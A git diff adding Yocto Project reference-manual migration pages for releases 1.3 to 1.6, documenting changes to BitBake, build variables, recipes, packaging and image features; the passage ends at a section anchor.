+.. _1.3-local-configuration:
+
+Local Configuration
+-------------------
+
+Differences include changes for
+:term:`SSTATE_MIRRORS` and ``bblayers.conf``.
+
+.. _migration-1.3-sstate-mirrors:
+
+SSTATE_MIRRORS
+~~~~~~~~~~~~~~
+
+The shared state cache (sstate-cache), as pointed to by
+:term:`SSTATE_DIR`, by default now has two-character
+subdirectories to prevent issues arising from too many files in the same
+directory. Also, native sstate-cache packages, which are built to run on
+the host system, will go into a subdirectory named using the distro ID
+string. If you copy the newly structured sstate-cache to a mirror
+location (either local or remote) and then point to it in
+:term:`SSTATE_MIRRORS`, you need to append "PATH"
+to the end of the mirror URL so that the path used by BitBake before the
+mirror substitution is appended to the path used to access the mirror.
+Here is an example: ::
+
+   SSTATE_MIRRORS = "file://.* http://someserver.tld/share/sstate/PATH"
+
+.. _migration-1.3-bblayers-conf:
+
+bblayers.conf
+~~~~~~~~~~~~~
+
+The ``meta-yocto`` layer consists of two parts that correspond to the
+Poky reference distribution and the reference hardware Board Support
+Packages (BSPs), respectively: ``meta-yocto`` and ``meta-yocto-bsp``.
+When running BitBake for the first time after upgrading, your
+``conf/bblayers.conf`` file will be updated to handle this change and
+you will be asked to re-run or restart for the changes to take effect.
+
+.. _1.3-recipes:
+
+Recipes
+-------
+
+Differences include changes for the following:
+
+.. _migration-1.3-python-function-whitespace:
+
+Python Function Whitespace
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+All Python functions must now use four spaces for indentation.
+Previously, an inconsistent mix of spaces and tabs existed, which made
+extending these functions using ``_append`` or ``_prepend`` complicated
+given that Python treats whitespace as syntactically significant. If you
+are defining or extending any Python functions (e.g.
+``populate_packages``, ``do_unpack``, ``do_patch`` and so forth) in
+custom recipes or classes, you need to ensure you are using consistent
+four-space indentation.
+
+.. _migration-1.3-proto=-in-src-uri:
+
+proto= in SRC_URI
+~~~~~~~~~~~~~~~~~
+
+Any use of ``proto=`` in :term:`SRC_URI` needs to be
+changed to ``protocol=``. In particular, this applies to the following
+URIs:
+
+-  ``svn://``
+
+-  ``bzr://``
+
+-  ``hg://``
+
+-  ``osc://``
+
+Other URIs were already using ``protocol=``. This change improves
+consistency.
+
+.. _migration-1.3-nativesdk:
+
+nativesdk
+~~~~~~~~~
+
+The suffix ``nativesdk`` is now implemented as a prefix, which
+simplifies a lot of the packaging code for ``nativesdk`` recipes. All
+custom ``nativesdk`` recipes, which are relocatable packages that are
+native to :term:`SDK_ARCH`, and any references need to
+be updated to use ``nativesdk-*`` instead of ``*-nativesdk``.
+
+.. _migration-1.3-task-recipes:
+
+Task Recipes
+~~~~~~~~~~~~
+
+"Task" recipes are now known as "Package groups" and have been renamed
+from ``task-*.bb`` to ``packagegroup-*.bb``. Existing references to the
+previous ``task-*`` names should work in most cases as there is an
+automatic upgrade path for most packages. However, you should update
+references in your own recipes and configurations as they could be
+removed in future releases. You should also rename any custom ``task-*``
+recipes to ``packagegroup-*``, and change them to inherit
+``packagegroup`` instead of ``task``, as well as taking the opportunity
+to remove anything now handled by ``packagegroup.bbclass``, such as
+providing ``-dev`` and ``-dbg`` packages, setting
+:term:`LIC_FILES_CHKSUM`, and so forth. See the
+":ref:`packagegroup.bbclass <ref-classes-packagegroup>`" section for
+further details.
+
+.. _migration-1.3-image-features:
+
+IMAGE_FEATURES
+~~~~~~~~~~~~~~
+
+Image recipes that previously included ``apps-console-core`` in
+:term:`IMAGE_FEATURES` should now include ``splash``
+instead to enable the boot-up splash screen. Retaining
+``apps-console-core`` will still include the splash screen but generates a
+warning. The ``apps-x11-core`` and ``apps-x11-games`` ``IMAGE_FEATURES``
+features have been removed.
+
+.. _migration-1.3-removed-recipes:
+
+Removed Recipes
+~~~~~~~~~~~~~~~
+
+The following recipes have been removed. For most of them, it is
+unlikely that you would have any references to them in your own
+:term:`Metadata`. However, you should check your metadata
+against this list to be sure:
+
+-  ``libx11-trim``: Replaced by ``libx11``, which has a negligible
+   size difference with modern Xorg.
+
+-  ``xserver-xorg-lite``: Use ``xserver-xorg``, which has a negligible
+   size difference when DRI and GLX modules are not installed.
+
+-  ``xserver-kdrive``: Effectively unmaintained for many years.
+
+-  ``mesa-xlib``: No longer serves any purpose.
+
+-  ``galago``: Replaced by telepathy.
+
+-  ``gail``: Functionality was integrated into GTK+ 2.13.
+
+-  ``eggdbus``: No longer needed.
+
+-  ``gcc-*-intermediate``: The build has been restructured to avoid
+   the need for this step.
+
+-  ``libgsmd``: Unmaintained for many years. Functionality now
+   provided by ``ofono`` instead.
+
+-  *contacts, dates, tasks, eds-tools*: Largely unmaintained PIM
+   application suite. It has been moved to ``meta-gnome`` in
+   ``meta-openembedded``.
+
+In addition to the previously listed changes, the ``meta-demoapps``
+directory has also been removed because the recipes in it were not being
+maintained and many had become obsolete or broken. Additionally, these
+recipes were not parsed in the default configuration. Many of these
+recipes are already provided in an updated and maintained form within
+the OpenEmbedded community layers such as ``meta-oe`` and
+``meta-gnome``. For the remainder, you can now find them in the
+``meta-extras`` repository, which is in the
+:yocto_git:`Source Repositories <>` at
+:yocto_git:`/cgit/cgit.cgi/meta-extras/`.
+
+.. _1.3-linux-kernel-naming:
+
+Linux Kernel Naming
+-------------------
+
+The naming scheme for kernel output binaries has been changed to now
+include :term:`PE` as part of the filename:
+::
+
+   KERNEL_IMAGE_BASE_NAME ?= "${KERNEL_IMAGETYPE}-${PE}-${PV}-${PR}-${MACHINE}-${DATETIME}"
+
+Because the ``PE`` variable is not set by default, these binary files
+could result with names that include two dash characters. Here is an
+example: ::
+
+   bzImage--3.10.9+git0+cd502a8814_7144bcc4b8-r0-qemux86-64-20130830085431.bin
+
+
diff --git a/documentation/ref-manual/migration-1.4.rst b/documentation/ref-manual/migration-1.4.rst
new file mode 100644
index 0000000000..daaea0ffa2
--- /dev/null
+++ b/documentation/ref-manual/migration-1.4.rst
@@ -0,0 +1,237 @@
+Moving to the Yocto Project 1.4 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.4 Release from the prior release.
+
+.. _migration-1.4-bitbake:
+
+BitBake
+-------
+
+Differences include the following:
+
+-  *Comment Continuation:* If a comment ends with a line continuation
+   (\\) character, then the next line must also be a comment. Any
+   instance where this is not the case, now triggers a warning. You must
+   either remove the continuation character, or be sure the next line is
+   a comment.
+
+-  *Package Name Overrides:* The runtime package specific variables
+   :term:`RDEPENDS`,
+   :term:`RRECOMMENDS`,
+   :term:`RSUGGESTS`,
+   :term:`RPROVIDES`,
+   :term:`RCONFLICTS`,
+   :term:`RREPLACES`, :term:`FILES`,
+   :term:`ALLOW_EMPTY`, and the pre, post, install,
+   and uninstall script functions ``pkg_preinst``, ``pkg_postinst``,
+   ``pkg_prerm``, and ``pkg_postrm`` should always have a package name
+   override. For example, use ``RDEPENDS_${PN}`` for the main package
+   instead of ``RDEPENDS``. BitBake uses more strict checks when it
+   parses recipes.
+
+.. _migration-1.4-build-behavior:
+
+Build Behavior
+--------------
+
+Differences include the following:
+
+-  *Shared State Code:* The shared state code has been optimized to
+   avoid running unnecessary tasks. For example, the following no longer
+   populates the target sysroot since that is not necessary:
+   ::
+
+      $ bitbake -c rootfs some-image
+
+   Instead, the system just needs to extract the
+   output package contents, re-create the packages, and construct the
+   root filesystem. This change is unlikely to cause any problems unless
+   you have missing declared dependencies.
+
+-  *Scanning Directory Names:* When scanning for files in
+   :term:`SRC_URI`, the build system now uses
+   :term:`FILESOVERRIDES` instead of
+   :term:`OVERRIDES` for the directory names. In
+   general, the values previously in ``OVERRIDES`` are now in
+   ``FILESOVERRIDES`` as well. However, if you relied upon an additional
+   value you previously added to ``OVERRIDES``, you might now need to
+   add it to ``FILESOVERRIDES`` unless you are already adding it through
+   the :term:`MACHINEOVERRIDES` or
+   :term:`DISTROOVERRIDES` variables, as
+   appropriate. For more related changes, see the
+   ":ref:`ref-manual/migration-1.4:variables`" section.
+
+.. _migration-1.4-proxies-and-fetching-source:
+
+Proxies and Fetching Source
+---------------------------
+
+A new ``oe-git-proxy`` script has been added to replace previous methods
+of handling proxies and fetching source from Git. See the
+``meta-yocto/conf/site.conf.sample`` file for information on how to use
+this script.
+
+.. _migration-1.4-custom-interfaces-file-netbase-change:
+
+Custom Interfaces File (netbase change)
+---------------------------------------
+
+If you have created your own custom ``etc/network/interfaces`` file by
+creating an append file for the ``netbase`` recipe, you now need to
+create an append file for the ``init-ifupdown`` recipe instead, which
+you can find in the :term:`Source Directory` at
+``meta/recipes-core/init-ifupdown``. For information on how to use
+append files, see the
+":ref:`dev-manual/dev-manual-common-tasks:using .bbappend files in your layer`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.4-remote-debugging:
+
+Remote Debugging
+----------------
+
+Support for remote debugging with the Eclipse IDE is now separated into
+an image feature (``eclipse-debug``) that corresponds to the
+``packagegroup-core-eclipse-debug`` package group. Previously, the
+debugging feature was included through the ``tools-debug`` image
+feature, which corresponds to the ``packagegroup-core-tools-debug``
+package group.
+
+.. _migration-1.4-variables:
+
+Variables
+---------
+
+The following variables have changed:
+
+-  ``SANITY_TESTED_DISTROS``: This variable now uses a distribution
+   ID, which is composed of the host distributor ID followed by the
+   release. Previously,
+   :term:`SANITY_TESTED_DISTROS` was
+   composed of the description field. For example, "Ubuntu 12.10"
+   becomes "Ubuntu-12.10". You do not need to worry about this change if
+   you are not specifically setting this variable, or if you are
+   specifically setting it to "".
+
+-  ``SRC_URI``: The ``${``\ :term:`PN`\ ``}``,
+   ``${``\ :term:`PF`\ ``}``,
+   ``${``\ :term:`P`\ ``}``, and ``FILE_DIRNAME`` directories
+   have been dropped from the default value of the
+   :term:`FILESPATH` variable, which is used as the
+   search path for finding files referred to in
+   :term:`SRC_URI`. If you have a recipe that relied upon
+   these directories, which would be unusual, then you will need to add
+   the appropriate paths within the recipe or, alternatively, rearrange
+   the files. The most common locations are still covered by ``${``\ :term:`BP`\ ``}``,
+   ``${``\ :term:`BPN`\ ``}``, and "files", which all remain in the default value of
+   :term:`FILESPATH`.
+
+.. _migration-target-package-management-with-rpm:
+
+Target Package Management with RPM
+----------------------------------
+
+If runtime package management is enabled and the RPM backend is
+selected, Smart is now installed for package download, dependency
+resolution, and upgrades instead of Zypper. For more information on how
+to use Smart, run the following command on the target:
+::
+
+   smart --help
+
+.. _migration-1.4-recipes-moved:
+
+Recipes Moved
+-------------
+
+The following recipes were moved from their previous locations because
+they are no longer used by anything in the OpenEmbedded-Core:
+
+-  ``clutter-box2d``: Now resides in the ``meta-oe`` layer.
+
+-  ``evolution-data-server``: Now resides in the ``meta-gnome`` layer.
+
+-  ``gthumb``: Now resides in the ``meta-gnome`` layer.
+
+-  ``gtkhtml2``: Now resides in the ``meta-oe`` layer.
+
+-  ``gupnp``: Now resides in the ``meta-multimedia`` layer.
+
+-  ``gypsy``: Now resides in the ``meta-oe`` layer.
+
+-  ``libcanberra``: Now resides in the ``meta-gnome`` layer.
+
+-  ``libgdata``: Now resides in the ``meta-gnome`` layer.
+
+-  ``libmusicbrainz``: Now resides in the ``meta-multimedia`` layer.
+
+-  ``metacity``: Now resides in the ``meta-gnome`` layer.
+
+-  ``polkit``: Now resides in the ``meta-oe`` layer.
+
+-  ``zeroconf``: Now resides in the ``meta-networking`` layer.
+
+.. _migration-1.4-removals-and-renames:
+
+Removals and Renames
+--------------------
+
+The following list shows what has been removed or renamed:
+
+-  ``evieext``: Removed because it has been removed from ``xserver``
+   since 2008.
+
+-  *Gtk+ DirectFB:* Removed support because upstream Gtk+ no longer
+   supports it as of version 2.18.
+
+-  ``libxfontcache / xfontcacheproto``: Removed because they were
+   removed from the Xorg server in 2008.
+
+-  ``libxp / libxprintapputil / libxprintutil / printproto``: Removed
+   because the XPrint server was removed from Xorg in 2008.
+
+-  ``libxtrap / xtrapproto``: Removed because their functionality was
+   broken upstream.
+
+-  *linux-yocto 3.0 kernel:* Removed with linux-yocto 3.8 kernel being
+   added. The linux-yocto 3.2 and linux-yocto 3.4 kernels remain as part
+   of the release.
+
+-  ``lsbsetup``: Removed with functionality now provided by
+   ``lsbtest``.
+
+-  ``matchbox-stroke``: Removed because it was never more than a
+   proof-of-concept.
+
+-  ``matchbox-wm-2 / matchbox-theme-sato-2``: Removed because they are
+   not maintained. However, ``matchbox-wm`` and ``matchbox-theme-sato``
+   are still provided.
+
+-  ``mesa-dri``: Renamed to ``mesa``.
+
+-  ``mesa-xlib``: Removed because it was no longer useful.
+
+-  ``mutter``: Removed because nothing ever uses it and the recipe is
+   very old.
+
+-  ``orinoco-conf``: Removed because it has become obsolete.
+
+-  ``update-modules``: Removed because it is no longer used. The
+   kernel module ``postinstall`` and ``postrm`` scripts can now do the
+   same task without the use of this script.
+
+-  ``web``: Removed because it is not maintained. Superseded by
+   ``web-webkit``.
+
+-  ``xf86bigfontproto``: Removed because upstream it has been disabled
+   by default since 2007. Nothing uses ``xf86bigfontproto``.
+
+-  ``xf86rushproto``: Removed because its dependency in ``xserver``
+   was spurious and it was removed in 2005.
+
+-  ``zypper / libzypp / sat-solver``: Removed and been functionally
+   replaced with Smart (``python-smartpm``) when RPM packaging is used
+   and package management is enabled on the target.
+
diff --git a/documentation/ref-manual/migration-1.5.rst b/documentation/ref-manual/migration-1.5.rst
new file mode 100644
index 0000000000..fc7aface9e
--- /dev/null
+++ b/documentation/ref-manual/migration-1.5.rst
@@ -0,0 +1,353 @@
+Moving to the Yocto Project 1.5 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.5 Release from the prior release.
+
+.. _migration-1.5-host-dependency-changes:
+
+Host Dependency Changes
+-----------------------
+
+The OpenEmbedded build system now has some additional requirements on
+the host system:
+
+-  Python 2.7.3+
+
+-  Tar 1.24+
+
+-  Git 1.7.8+
+
+-  Patched version of Make if you are using 3.82. Most distributions
+   that provide Make 3.82 use the patched version.
+
+If the Linux distribution you are using on your build host does not
+provide packages for these, you can install and use the Buildtools
+tarball, which provides an SDK-like environment containing them.
+
+For more information on this requirement, see the
+":ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`"
+section.
+
+.. _migration-1.5-atom-pc-bsp:
+
+``atom-pc`` Board Support Package (BSP)
+---------------------------------------
+
+The ``atom-pc`` hardware reference BSP has been replaced by a
+``genericx86`` BSP. This BSP is not necessarily guaranteed to work on
+all x86 hardware, but it will run on a wider range of systems than the
+``atom-pc`` did.
+
+.. note::
+
+   Additionally, a ``genericx86-64`` BSP has been added for 64-bit Atom
+   systems.
+
+.. _migration-1.5-bitbake:
+
+BitBake
+-------
+
+The following changes have been made that relate to BitBake:
+
+-  BitBake now supports a ``_remove`` operator. The addition of this
+   operator means you will have to rename any items in recipe space
+   (functions, variables) whose names currently contain ``_remove_`` or
+   end with ``_remove`` to avoid unexpected behavior.
+
+-  BitBake's global method pool has been removed. This method is not
+   particularly useful and led to clashes between recipes containing
+   functions that had the same name.
+
+-  The "none" server backend has been removed. The "process" server
+   backend has been serving well as the default for a long time now.
+
+-  The ``bitbake-runtask`` script has been removed.
+
+-  ``${``\ :term:`P`\ ``}`` and
+   ``${``\ :term:`PF`\ ``}`` are no longer added to
+   :term:`PROVIDES` by default in ``bitbake.conf``.
+   These version-specific ``PROVIDES`` items were seldom used.
+   Attempting to use them could result in two versions being built
+   simultaneously rather than just one version due to the way BitBake
+   resolves dependencies.
+
+.. _migration-1.5-qa-warnings:
+
+QA Warnings
+-----------
+
+The following changes have been made to the package QA checks:
+
+-  If you have customized :term:`ERROR_QA` or
+   :term:`WARN_QA` values in your configuration, check
+   that they contain all of the issues that you wish to be reported.
+   Previous Yocto Project versions contained a bug that meant that any
+   item not mentioned in ``ERROR_QA`` or ``WARN_QA`` would be treated as
+   a warning. Consequently, several important items were not already in
+   the default value of ``WARN_QA``. All of the possible QA checks are
+   now documented in the ":ref:`insane.bbclass <ref-classes-insane>`"
+   section.
+
+-  An additional QA check has been added to check if
+   ``/usr/share/info/dir`` is being installed. Your recipe should delete
+   this file within :ref:`ref-tasks-install` if "make
+   install" is installing it.
+
+-  If you are using the ``buildhistory`` class, the check for the package
+   version going backwards is now controlled using a standard QA check.
+   Thus, if you have customized your ``ERROR_QA`` or ``WARN_QA`` values
+   and still wish to have this check performed, you should add
+   "version-going-backwards" to your value for one or the other
+   variables depending on how you wish it to be handled. See the
+   documented QA checks in the
+   ":ref:`insane.bbclass <ref-classes-insane>`" section.
+
+.. _migration-1.5-directory-layout-changes:
+
+Directory Layout Changes
+------------------------
+
+The following directory changes exist:
+
+-  Output SDK installer files are now named to include the image name
+   and tuning architecture through the :term:`SDK_NAME`
+   variable.
+
+-  Images and related files are now installed into a directory that is
+   specific to the machine, instead of a parent directory containing
+   output files for multiple machines. The
+   :term:`DEPLOY_DIR_IMAGE` variable continues
+   to point to the directory containing images for the current
+   :term:`MACHINE` and should be used anywhere there is a
+   need to refer to this directory. The ``runqemu`` script now uses this
+   variable to find images and kernel binaries and will use BitBake to
+   determine the directory. Alternatively, you can set the
+   ``DEPLOY_DIR_IMAGE`` variable in the external environment.
+
+-  When buildhistory is enabled, its output is now written under the
+   :term:`Build Directory` rather than
+   :term:`TMPDIR`. Doing so makes it easier to delete
+   ``TMPDIR`` and preserve the build history. Additionally, data for
+   produced SDKs is now split by :term:`IMAGE_NAME`.
+
+-  The ``pkgdata`` directory produced as part of the packaging process
+   has been collapsed into a single machine-specific directory. This
+   directory is located under ``sysroots`` and uses a machine-specific
+   name (i.e. ``tmp/sysroots/machine/pkgdata``).
+
+.. _migration-1.5-shortened-git-srcrev-values:
+
+Shortened Git ``SRCREV`` Values
+-------------------------------
+
+BitBake will now shorten revisions from Git repositories from the normal
+40 characters down to 10 characters within :term:`SRCPV`
+for improved usability in path and file names. This change should be
+safe within contexts where these revisions are used because the chances
+of spatially close collisions is very low. Distant collisions are not a
+major issue in the way the values are used.
+
+.. _migration-1.5-image-features:
+
+``IMAGE_FEATURES``
+------------------
+
+The following changes have been made that relate to
+:term:`IMAGE_FEATURES`:
+
+-  The value of ``IMAGE_FEATURES`` is now validated to ensure invalid
+   feature items are not added. Some users mistakenly add package names
+   to this variable instead of using
+   :term:`IMAGE_INSTALL` in order to have the
+   package added to the image, which does not work. This change is
+   intended to catch those kinds of situations. Valid ``IMAGE_FEATURES``
+   are drawn from ``PACKAGE_GROUP`` definitions,
+   :term:`COMPLEMENTARY_GLOB` and a new
+   "validitems" varflag on ``IMAGE_FEATURES``. The "validitems" varflag
+   change allows additional features to be added if they are not
+   provided using the previous two mechanisms.
+
+-  The previously deprecated "apps-console-core" ``IMAGE_FEATURES`` item
+   is no longer supported. Add "splash" to ``IMAGE_FEATURES`` if you
+   wish to have the splash screen enabled, since this is all that
+   apps-console-core was doing.
+
+.. _migration-1.5-run:
+
+``/run``
+--------
+
+The ``/run`` directory from the Filesystem Hierarchy Standard 3.0 has
+been introduced. You can find some of the implications for this change
+`here <http://cgit.openembedded.org/openembedded-core/commit/?id=0e326280a15b0f2c4ef2ef4ec441f63f55b75873>`__.
+The change also means that recipes that install files to ``/var/run``
+must be changed. You can find a guide on how to make these changes
+`here <https://www.mail-archive.com/openembedded-devel@lists.openembedded.org/msg31649.html>`__.
+
+.. _migration-1.5-removal-of-package-manager-database-within-image-recipes:
+
+Removal of Package Manager Database Within Image Recipes
+--------------------------------------------------------
+
+The image ``core-image-minimal`` no longer adds
+``remove_packaging_data_files`` to
+:term:`ROOTFS_POSTPROCESS_COMMAND`.
+This addition is now handled automatically when "package-management" is
+not in :term:`IMAGE_FEATURES`. If you have custom
+image recipes that make this addition, you should remove the lines, as
+they are not needed and might interfere with correct operation of
+postinstall scripts.
+
+.. _migration-1.5-images-now-rebuild-only-on-changes-instead-of-every-time:
+
+Images Now Rebuild Only on Changes Instead of Every Time
+--------------------------------------------------------
+
+The :ref:`ref-tasks-rootfs` and other related image
+construction tasks are no longer marked as "nostamp". Consequently, they
+will only be re-executed when their inputs have changed. Previous
+versions of the OpenEmbedded build system always rebuilt the image when
+requested rather when necessary.
+
+.. _migration-1.5-task-recipes:
+
+Task Recipes
+------------
+
+The previously deprecated ``task.bbclass`` has now been dropped. For
+recipes that previously inherited from this class, you should rename
+them from ``task-*`` to ``packagegroup-*`` and inherit packagegroup
+instead.
+
+For more information, see the
+":ref:`packagegroup.bbclass <ref-classes-packagegroup>`" section.
+
+.. _migration-1.5-busybox:
+
+BusyBox
+-------
+
+By default, we now split BusyBox into two binaries: one that is suid
+root for those components that need it, and another for the rest of the
+components. Splitting BusyBox allows for optimization that eliminates
+the ``tinylogin`` recipe as recommended by upstream. You can disable
+this split by setting
+:term:`BUSYBOX_SPLIT_SUID` to "0".
+
+.. _migration-1.5-automated-image-testing:
+
+Automated Image Testing
+-----------------------
+
+A new automated image testing framework has been added through the
+:ref:`testimage.bbclass <ref-classes-testimage*>` class. This
+framework replaces the older ``imagetest-qemu`` framework.
+
+You can learn more about performing automated image tests in the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.5-build-history:
+
+Build History
+-------------
+
+Following are changes to Build History:
+
+-  Installed package sizes: ``installed-package-sizes.txt`` for an image
+   now records the size of the files installed by each package instead
+   of the size of each compressed package archive file.
+
+-  The dependency graphs (``depends*.dot``) now use the actual package
+   names instead of replacing dashes, dots and plus signs with
+   underscores.
+
+-  The ``buildhistory-diff`` and ``buildhistory-collect-srcrevs``
+   utilities have improved command-line handling. Use the ``--help``
+   option for each utility for more information on the new syntax.
+
+For more information on Build History, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.5-udev:
+
+``udev``
+--------
+
+Following are changes to ``udev``:
+
+-  ``udev`` no longer brings in ``udev-extraconf`` automatically through
+   :term:`RRECOMMENDS`, since this was originally
+   intended to be optional. If you need the extra rules, then add
+   ``udev-extraconf`` to your image.
+
+-  ``udev`` no longer brings in ``pciutils-ids`` or ``usbutils-ids``
+   through ``RRECOMMENDS``. These are not needed by ``udev`` itself and
+   removing them saves around 350KB.
+
+.. _migration-1.5-removed-renamed-recipes:
+
+Removed and Renamed Recipes
+---------------------------
+
+-  The ``linux-yocto`` 3.2 kernel has been removed.
+
+-  ``libtool-nativesdk`` has been renamed to ``nativesdk-libtool``.
+
+-  ``tinylogin`` has been removed. It has been replaced by a suid
+   portion of Busybox. See the "`BusyBox <#busybox>`__"
+   section for more information.
+
+-  ``external-python-tarball`` has been renamed to
+   ``buildtools-tarball``.
+
+-  ``web-webkit`` has been removed. It has been functionally replaced by
+   ``midori``.
+
+-  ``imake`` has been removed. It is no longer needed by any other
+   recipe.
+
+-  ``transfig-native`` has been removed. It is no longer needed by any
+   other recipe.
+
+-  ``anjuta-remote-run`` has been removed. Anjuta IDE integration has
+   not been officially supported for several releases.
+
+.. _migration-1.5-other-changes:
+
+Other Changes
+-------------
+
+Following is a list of short entries describing other changes:
+
+-  ``run-postinsts``: Make this generic.
+
+-  ``base-files``: Remove the unnecessary ``media/``\ xxx directories.
+
+-  ``alsa-state``: Provide an empty ``asound.conf`` by default.
+
+-  ``classes/image``: Ensure
+   :term:`BAD_RECOMMENDATIONS` supports
+   pre-renamed package names.
+
+-  ``classes/rootfs_rpm``: Implement ``BAD_RECOMMENDATIONS`` for RPM.
+
+-  ``systemd``: Remove ``systemd_unitdir`` if ``systemd`` is not in
+   :term:`DISTRO_FEATURES`.
+
+-  ``systemd``: Remove ``init.d`` dir if ``systemd`` unit file is
+   present and ``sysvinit`` is not a distro feature.
+
+-  ``libpam``: Deny all services for the ``OTHER`` entries.
+
+-  ``image.bbclass``: Move ``runtime_mapping_rename`` to avoid conflict
+   with ``multilib``. See :yocto_bugs:`YOCTO #4993 </show_bug.cgi?id=4993>`
+   in Bugzilla for more information.
+
+-  ``linux-dtb``: Use kernel build system to generate the ``dtb`` files.
+
+-  ``kern-tools``: Switch from guilt to new ``kgit-s2q`` tool.
+
diff --git a/documentation/ref-manual/migration-1.6.rst b/documentation/ref-manual/migration-1.6.rst
new file mode 100644
index 0000000000..a6c4c8a93a
--- /dev/null
+++ b/documentation/ref-manual/migration-1.6.rst
@@ -0,0 +1,416 @@
+Moving to the Yocto Project 1.6 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.6 Release from the prior release.
+
+.. _migration-1.6-archiver-class:
+
+``archiver`` Class
+------------------
+
+The :ref:`archiver <ref-classes-archiver>` class has been rewritten
+and its configuration has been simplified. For more details on the
+source archiver, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.6-packaging-changes:
+
+Packaging Changes
+-----------------
+
+The following packaging changes have been made:
+
+-  The ``binutils`` recipe no longer produces a ``binutils-symlinks``
+   package. ``update-alternatives`` is now used to handle the preferred
+   ``binutils`` variant on the target instead.
+
+-  The tc (traffic control) utilities have been split out of the main
+   ``iproute2`` package and put into the ``iproute2-tc`` package.
+
+-  The ``gtk-engines`` schemas have been moved to a dedicated
+   ``gtk-engines-schemas`` package.
+
+-  The ``armv7a`` with thumb package architecture suffix has changed.
+   The suffix for these packages with the thumb optimization enabled is
+   "t2" as it should be. Use of this suffix was not the case in the 1.5
+   release. Architecture names will change within package feeds as a
+   result.
+
+.. _migration-1.6-bitbake:
+
+BitBake
+-------
+
+The following changes have been made to :term:`BitBake`.
+
+.. _migration-1.6-matching-branch-requirement-for-git-fetching:
+
+Matching Branch Requirement for Git Fetching
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When fetching source from a Git repository using
+:term:`SRC_URI`, BitBake will now validate the
+:term:`SRCREV` value against the branch. You can specify
+the branch using the following form:
+::
+
+      SRC_URI = "git://server.name/repository;branch=branchname"
+
+If you do not specify a branch, BitBake looks in the default "master" branch.
+
+Alternatively, if you need to bypass this check (e.g. if you are
+fetching a revision corresponding to a tag that is not on any branch),
+you can add ";nobranch=1" to the end of the URL within ``SRC_URI``.
+
+.. _migration-1.6-bitbake-deps:
+
+Python Definition substitutions
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+BitBake had some previously deprecated Python definitions within its
+``bb`` module removed. You should use their sub-module counterparts
+instead:
+
+-  ``bb.MalformedUrl``: Use ``bb.fetch.MalformedUrl``.
+
+-  ``bb.encodeurl``: Use ``bb.fetch.encodeurl``.
+
+-  ``bb.decodeurl``: Use ``bb.fetch.decodeurl``
+
+-  ``bb.mkdirhier``: Use ``bb.utils.mkdirhier``.
+
+-  ``bb.movefile``: Use ``bb.utils.movefile``.
+
+-  ``bb.copyfile``: Use ``bb.utils.copyfile``.
+
+-  ``bb.which``: Use ``bb.utils.which``.
+
+-  ``bb.vercmp_string``: Use ``bb.utils.vercmp_string``.
+
+-  ``bb.vercmp``: Use ``bb.utils.vercmp``.
+
+.. _migration-1.6-bitbake-fetcher:
+
+SVK Fetcher
+~~~~~~~~~~~
+
+The SVK fetcher has been removed from BitBake.
+
+.. _migration-1.6-bitbake-console-output:
+
+Console Output Error Redirection
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The BitBake console UI will now output errors to ``stderr`` instead of
+``stdout``. Consequently, if you are piping or redirecting the output of
+``bitbake`` to somewhere else, and you wish to retain the errors, you
+will need to add ``2>&1`` (or something similar) to the end of your
+``bitbake`` command line.
+
+.. _migration-1.6-task-taskname-overrides:
+
+``task-``\ taskname Overrides
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+``task-``\ taskname overrides have been adjusted so that tasks whose
+names contain underscores have the underscores replaced by hyphens for
+the override so that they now function properly. For example, the task
+override for :ref:`ref-tasks-populate_sdk` is
+``task-populate-sdk``.
+
+.. _migration-1.6-variable-changes:
+
+Changes to Variables
+--------------------
+
+The following variables have changed. For information on the
+OpenEmbedded build system variables, see the ":doc:`ref-variables`" Chapter.
+
+.. _migration-1.6-variable-changes-TMPDIR:
+
+``TMPDIR``
+~~~~~~~~~~
+
+:term:`TMPDIR` can no longer be on an NFS mount. NFS does
+not offer full POSIX locking and inode consistency and can cause
+unexpected issues if used to store ``TMPDIR``.
+
+The check for this occurs on startup. If ``TMPDIR`` is detected on an
+NFS mount, an error occurs.
+
+.. _migration-1.6-variable-changes-PRINC:
+
+``PRINC``
+~~~~~~~~~
+
+The ``PRINC`` variable has been deprecated and triggers a warning if
+detected during a build. For :term:`PR` increments on changes,
+use the PR service instead. You can find out more about this service in
+the ":ref:`dev-manual/dev-manual-common-tasks:working with a pr service`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.6-variable-changes-IMAGE_TYPES:
+
+``IMAGE_TYPES``
+~~~~~~~~~~~~~~~
+
+The "sum.jffs2" option for :term:`IMAGE_TYPES` has
+been replaced by the "jffs2.sum" option, which fits the processing
+order.
+
+.. _migration-1.6-variable-changes-COPY_LIC_MANIFEST:
+
+``COPY_LIC_MANIFEST``
+~~~~~~~~~~~~~~~~~~~~~
+
+The :term:`COPY_LIC_MANIFEST` variable must now
+be set to "1" rather than any value in order to enable it.
+
+.. _migration-1.6-variable-changes-COPY_LIC_DIRS:
+
+``COPY_LIC_DIRS``
+~~~~~~~~~~~~~~~~~
+
+The :term:`COPY_LIC_DIRS` variable must now be set
+to "1" rather than any value in order to enable it.
+
+.. _migration-1.6-variable-changes-PACKAGE_GROUP:
+
+``PACKAGE_GROUP``
+~~~~~~~~~~~~~~~~~
+
+The ``PACKAGE_GROUP`` variable has been renamed to
+:term:`FEATURE_PACKAGES` to more accurately
+reflect its purpose. You can still use ``PACKAGE_GROUP`` but the
+OpenEmbedded build system produces a warning message when it encounters
+the variable.
+
+.. _migration-1.6-variable-changes-variable-entry-behavior:
+
